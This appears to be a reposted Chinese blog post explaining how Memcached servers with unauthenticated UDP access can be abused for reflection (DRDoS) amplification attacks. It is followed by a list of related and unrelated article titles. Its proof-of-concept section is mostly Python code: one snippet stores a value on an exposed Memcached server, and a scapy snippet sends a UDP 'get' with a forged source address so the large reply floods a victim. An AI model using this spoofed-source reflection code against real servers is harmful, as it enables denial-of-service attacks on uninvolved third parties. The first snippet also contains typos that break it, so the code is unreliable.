一、Memcached反射攻击原理

1、反射DRDoS攻击:

DRDoS攻击时DoS攻击的一种,DoS是指通过发送或引发大量的资源消耗导致服务不可用的一种攻击方式,中文称之为拒绝服务攻击。DRDoS是反射性拒绝服务攻击,其原理是通过利用你的程序漏洞,发送畸形报文诱发你回复大数据量的报文,从而达到消耗资源,拒绝服务的目的。

2、为什么Memcached可以诱发DRDoS:

因为Memcached是一个缓存服务器,很多web站点用来存储缓存数据,以防止WEB服务器承担更多性能损耗。但是这样情况下,如果发送一个请求,回复大数据量的响应报文,则可以被诱发DRDoS,攻击手段就是重复变换源的发送请求报文即可。

3、以上还有两个前提:

(1)Memcached支持TCP和UDP,且其中UDP是不需要状态连接,和握手的。

(2)Memcached存在未授权访问的情况。

二、Memcached DRDoS的poc

1、攻击手法,

(1)访问可以控制的未授权的memcached,set设置键值

1 set abc 0 0 10
2 abc ->键名
3 0 -> flag
4 0 -> exptime 过期时间,0便是永不过期
5 10 -> 返回10Byte的数据,当然可以返回更多

python代码如下

 1 # -*- coding:utf-8 -*-
 2
 3 import socket
 4
 5 target_host = "192.168.1.1"
 6 target_port = 11211
 7 client = sokcet.socket(socket.AF_INET,socket.STREAM)
 8 client.settimeout(10)
 9 client.connect((target_host,target_port))
10
11 client.send("set abcd 0 0 10\r\nabcd\r\n\r\n\r\n\r\n\r\n")
12 data = client.recv(1024)
13 print data

(2)然后get这个abc即可

1 # -*- coding:utf-8 -*-
2
3 from scapy.all import *
4
5 data = "\x00\x00\x00\x00\x00\x01\x00\x00get abcd\r\n"
6 pkt = scapy.all.IP(dst="192.168.1.1",src="192.168.1.2") / scapy.all.UDP(sport=80,dport=11211) / data
7 send(pkt ,inter=1,count=1)

转载于:https://www.cnblogs.com/KevinGeorge/p/8506845.html

关于Memcached反射型DRDoS攻击分析相关推荐

  1. 放大倍数超5万倍的Memcached DDoS反射攻击,怎么破?

    欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由腾讯游戏云发表于云+社区专栏 背景:Memcached攻击创造DDoS攻击流量纪录 近日,利用Memcached服务器实施反射DDoS ...

  2. 基于Memcached的DRDos的研究与攻击复现

    [声明]本文仅作学习研究之用,欢迎一起探讨,请勿发动恶意攻击,否则后果自负! 核弹级DDoS攻击肆掠全球 进入3月,春天到了,万物复苏,又到了动物交配的季节!咦!不对不对,我要说什么来着..O(∩_∩ ...

  3. 反射型 DDoS 攻击的原理和防范措施

    随着僵尸网络的兴起,同时由于攻击方法简单.影响较大.难以追查等特点,分布式拒绝服务攻击(DDoS,Distributed Denial of Service)得到快速壮大和日益泛滥. 成千上万主机组成 ...

  4. 758.6G每秒:阿里云成功防御国内最大规模Memcached DDoS反射攻击

    本周,阿里云安全DDoS监控中心数据显示,利用Memcached 进行DDoS攻击的趋势快速升温.今天, 阿里云已经成功监控和防御一起流量高达758.6Gbps的Memcached DDoS反射攻击. ...

  5. DOS、DOS攻击、DDOS攻击、DRDOS攻击

    DOS:中文名字是拒绝服务,一切引起DOS行为的攻击被称为DOS攻击.该攻击的效果是使得计算机或者网络无法提供正常的服务.常见的DOS攻击有针对计算机网络带宽和连通性的攻击.DOS是单机与单机之间的攻 ...

  6. 内网渗透测试:NTLM Relay攻击分析

    目录 基础知识 NTLM认证过程 NTLM中继攻击原理 获得Net-NTLM Relay的思路 利用LLMNR和NetBIOS欺骗获得Net-NTLMHash 利用WPAD劫持获得Net-NTLMHa ...

  7. DNS反射放大攻击分析——DNS反射放大攻击主要是利用DNS回复包比请求包大的特点,放大流量,伪造请求包的源IP地址为受害者IP,将应答包的流量引入受害的服务器...

    DNS反射放大攻击分析 摘自:http://www.shaojike.com/2016/08/19/DNS%E6%94%BE%E5%A4%A7%E6%94%BB%E5%87%BB%E7%AE%80%E ...

  8. 针对CDP协议攻击分析及安全防护

    针对CDP协议攻击分析及安全防护<?xml:namespace prefix="o"> ?xml:namespace> 熟悉Cisco的朋友都知道CDP协议是思科 ...

  9. 网页服务器攻击,WEB服务器攻击分析全过程_91Ri.org

    故障现象描述 故障现象描述 客户对外服务的WEB服务器无法访问,内网机器访问互联网速度较慢. 基本环境描述 用户基本网络拓扑如下: 用户的Internet出口基本网络拓扑如上图所示,其中出口带宽为1M ...

最新文章

  1. 服务容错设计:流量控制、服务熔断、服务降级
  2. AIX修改系统时间 命令
  3. python 多进程与多线程配合拷贝文件目录
  4. 椭圆形中间一个大写的v_静安区椭圆形桥梁空心板橡胶气囊,方形桥梁板橡胶气囊_冠桥橡胶...
  5. 详解Python的max、min和sum函数用法
  6. 学习ASP.NET Core Razor 编程系列三——创建数据表及创建项目基本页面
  7. JavaScript原生对象属性和方法详解——Array对象
  8. JavaScript ES5之Object.create函数详解
  9. 数据库的几个基本概念
  10. P2668 斗地主 贪心+深搜
  11. 在CentOS 7上安装Nginx服务器
  12. Java 虚拟机详解
  13. 差分进化算法求解函数最优解matlab实现
  14. masm32快速编辑器菜单翻译整理
  15. 从键盘交互式输入-一个人的18位的身份证号,以类似于“2001年09月12日”的形式输出该人的出生日期。
  16. matlab提取电压基波分量,有源电力滤波器三种基波提取方法的对比分析
  17. HyperMesh 实用教程(一)组件
  18. 企业邮局和邮件服务器
  19. ] 爆笑囧人囧事2009大合集![
  20. 河北工程大学计算机科学与技术分数线,2019年河北工程大学优势专业排名及分数线...

热门文章

  1. 为什么中国有很大一部分人不愿使用windows10?
  2. 为什么现在年轻人都在寻找副业、兼职?难道只有物价生活成本上涨?
  3. 几个好朋友在一起吃饭,结账时大家都抢着买单,你会怎么做?
  4. 互联网产品经理的核心竞争力是什么呢?
  5. 越有钱越小气,这话说的一点儿都不错
  6. 绝大部分人根本没有职业素养
  7. Speaking of Samsung, I don’t know if you have any
  8. python入门——P41魔法方法:构造和析构
  9. Qt4_Laying Out Widgets Widgets
  10. iptables: Resource temporarily unavailable.问题